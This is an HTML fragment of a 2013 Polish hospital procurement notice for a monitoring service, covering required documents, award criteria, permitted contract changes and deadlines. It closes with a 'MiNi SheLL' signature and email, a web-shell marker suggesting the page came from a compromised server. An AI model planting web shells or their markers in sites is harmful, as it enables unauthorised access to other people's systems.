<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwości zmiany umowy w sytuacji gdy zmiany nie dało się przewidzieć w chwili zawarcia umowy lub gdy zmiana jest korzystna dla Zamawiającego.
Zamawiający przewiduje następujące możliwości zmiany do umowy:
1 zmiana terminu realizacji umowy,
2 zmiany poszczególnych godzin, terminów wykonania poszczególnych czynności składających się na wykonanie przedmiotu umowy,
3 zmiana zakresu lub sposobu realizacji Przedmiotu Umowy w przypadku gdy jest to zmiana korzystna dla Zamawiającego lub wynika z przyczyn niezależnych od Zamawiającego i Wykonawcy, których nie można było wcześniej przewidzieć przy zachowaniu należytej staranności, a które mają wpływ na realizację Przedmiotu Umowy;
4 zmiana świadczenia lub sposobu świadczenia usługi na poszczególnych oddziałach, budynkach,
5 objęcie monitoringiem większej ilości oddziałów, budynków przy nieprzekroczeniu wartości umowy,
6 zmniejszenie ilości oddziałów lub budynków objętych monitoringiem,
7zmiana zakresu lub sposobu realizacji Przedmiot Umowy z uwagi na zmiany organizacyjne Zamawiającego,
8 zmiana wynagrodzenia w przypadku zmniejszenia zakresu Przedmiotu Umowy proporcjonalnie do zmniejszenia zakresu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolski.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01  211 Warszawa, ul. Kasprzaka 17 Pawilon nr 8 sekcja zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2013 godzina 09:00, miejsce: Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01  211 Warszawa, ul. Kasprzaka 17 Pawilon nr 2 Kancelaria Główna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com